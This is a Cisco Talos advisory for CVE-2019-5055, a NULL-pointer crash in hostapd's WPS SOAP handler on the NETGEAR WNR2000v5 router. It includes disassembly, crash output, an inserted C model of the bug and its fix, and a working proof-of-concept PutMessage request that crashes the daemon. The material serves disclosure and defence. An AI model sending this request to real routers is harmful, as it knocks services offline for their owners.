CVE-2019-5055: TALOS-2019-0832 || Cisco Talos Intelligence Group
Summary
An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.
Tested Versions
NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70
Product URLs
https://www.netgear.com/support/product/WNR2000v5
CVSSv3 Score
7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CWE
CWE-476: NULL Pointer Dereference
Details
The NETGEAR N300 is a small, affordable wireless router with minimal features.
When a specific SOAP request is sent to the hostapd daemon's UPnP WPS control endpoint (/wps_control on TCP port 49152, as used in the proof of concept below), web_connection_check_data() calls wps_process_msg() with a NULL first argument under certain conditions.
0x44e5d4 <web_connection_check_data+2372>: lw a0,20(s1)
0x44e5d8 <web_connection_check_data+2376>: move a1,zero
=> 0x44e5dc <web_connection_check_data+2380>: jalr t9 // call wps_process_msg()
0x44e5e0 <web_connection_check_data+2384>: move a2,v0
The problem is that nothing checks whether the M1 stage of the WPS exchange has already taken place before a PutMessage request is processed. That stage is normally driven by the GetDeviceInfo() method:
POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo"
Content-type: text/xml
Content-Length: 320
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:GetDeviceInfo xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
</m:GetDeviceInfo>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
This method populates the structure that is later passed to wps_process_msg(). If no client has called GetDeviceInfo() since the daemon started, that pointer is still NULL, and wps_process_msg() crashes as soon as it dereferences it (a0 == 0x00 at the call site):
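The ordering bug above in reduced form, written as an added example for this advisory rather than code from hostapd or NETGEAR's firmware. The structure names, the reply codes and the stand-in wps_process_msg_model() are assumptions that model the behaviour described (a per-peer session pointer that stays NULL until GetDeviceInfo runs); put_message_unchecked() shows the vulnerable pattern, put_message_checked() the one-line check that turns the crash into an HTTP error.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical reply codes for the SOAP handlers (not hostapd's enum). */
enum http_reply_code {
    HTTP_OK = 200,
    HTTP_BAD_REQUEST = 400,
    HTTP_INTERNAL_SERVER_ERROR = 500
};

/* Model of the per-session WPS state that GetDeviceInfo sets up. */
struct wps_data {
    int state;   /* 1 = M1 handed out, waiting for M2; 2 = M2 accepted */
};

/* Model of the per-peer record: wps stays NULL until GetDeviceInfo runs. */
struct upnp_wps_peer {
    struct wps_data *wps;
};

/* GetDeviceInfo: create the session whose M1 the AP returns to the registrar. */
enum http_reply_code process_get_device_info(struct upnp_wps_peer *peer)
{
    struct wps_data *wps = calloc(1, sizeof(*wps));
    if (!wps)
        return HTTP_INTERNAL_SERVER_ERROR;
    wps->state = 1;
    free(peer->wps);      /* a repeated GetDeviceInfo restarts the session */
    peer->wps = wps;
    return HTTP_OK;
}

/* Stand-in for wps_process_msg(): reads through wps unconditionally, like the
 * real function's first instruction (lw v0,4(a0)). A NULL wps faults here. */
static int wps_process_msg_model(struct wps_data *wps, const unsigned char *msg, size_t len)
{
    (void)msg;
    if (wps->state != 1 || len == 0)
        return -1;
    wps->state = 2;
    return 0;
}

/* Vulnerable pattern: PutMessage forwards peer->wps without looking at it. */
enum http_reply_code put_message_unchecked(struct upnp_wps_peer *peer,
                                           const unsigned char *msg, size_t len)
{
    return wps_process_msg_model(peer->wps, msg, len) == 0 ? HTTP_OK : HTTP_BAD_REQUEST;
}

/* Hardened pattern: refuse PutMessage until a session exists. */
enum http_reply_code put_message_checked(struct upnp_wps_peer *peer,
                                         const unsigned char *msg, size_t len)
{
    if (!peer->wps)
        return HTTP_INTERNAL_SERVER_ERROR;
    return wps_process_msg_model(peer->wps, msg, len) == 0 ? HTTP_OK : HTTP_BAD_REQUEST;
}

/* Replays the advisory's sequence against the checked handler and returns the
 * reply code of the requested step: 0 = PutMessage with no session,
 * 1 = GetDeviceInfo, 2 = PutMessage after the session exists. */
enum http_reply_code sequence_step(int step)
{
    struct upnp_wps_peer peer = { .wps = NULL };
    const unsigned char msg[] = "AAAA";   /* constructed; mirrors the PoC's NewInMessage */
    enum http_reply_code codes[3];

    codes[0] = put_message_checked(&peer, msg, sizeof msg - 1);   /* 500, not a crash */
    codes[1] = process_get_device_info(&peer);                    /* 200 */
    codes[2] = put_message_checked(&peer, msg, sizeof msg - 1);   /* 200 */
    free(peer.wps);
    return (step >= 0 && step < 3) ? codes[step] : HTTP_BAD_REQUEST;
}

int main(void)
{
    /* Swapping put_message_checked for put_message_unchecked in step 0 would
     * dereference NULL, which is the SIGSEGV in the crash information above. */
    for (int i = 0; i < 3; i++)
        printf("step %d -> %d\n", i, sequence_step(i));
    return 0;
}
```

The fix is deliberately placed in the handler rather than in wps_process_msg(): the handler is the only place that knows a session was never started, and a 500 to the unauthenticated client costs nothing, whereas a crash takes the whole daemon down.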
0044e5d4 lw a0,0x14(s1) // $a0 == 0x00
0044e5d8 clear a1
0044e5dc jalr t9=>wps_process_msg
0044e5e0 _move a2,v0
Crash Information
Program received signal SIGSEGV, Segmentation fault.
0x0043cc7c in ?? ()
0x43cc70 <wps_get_msg+24>: lw t9,-31756(gp)
0x43cc74 <wps_get_msg+28>: jr t9
0x43cc78 <wps_get_msg+32>: nop
=> 0x43cc7c <wps_process_msg>: lw v0,4(a0) // Crash
0x43cc80 <wps_process_msg+4>: lui gp,0x49
0x43cc84 <wps_process_msg+8>: beqz v0,0x43cc94 <wps_process_msg+24>
0x43cc88 <wps_process_msg+12>: addiu gp,gp,6416
0x43cc8c <wps_process_msg+16>: b 0x43cc98 <wps_process_msg+28>
0x43cc90 <wps_process_msg+20>: lw t9,-30984(gp)
peda-mips > x/32xw $a0
0x0: Cannot access memory at address 0x0
peda-mips > bt
#0 0x0043cc7c in wps_process_msg ()
#1 0x0044e5e4 in web_connection_check_data ()
#2 0x004515fc in httpread_read_handler ()
#3 0x00421ff8 in eloop_sock_table_dispatch ()
#4 0x004226ec in eloop_run ()
#5 0x00408068 in main ()
Exploit Proof of Concept
# Send to <router_ip>:49152
POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage"
Host: 192.168.1.1:49152
Content-Type: text/xml
Content-Length: 357
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:PutMessage xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewInMessage>AAAA</NewInMessage>
</m:PutMessage>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Timeline
2019-05-08 - Vendor Disclosure
2019-09-09 - Public Release
Discovered by Dave McDaniel of Cisco Talos.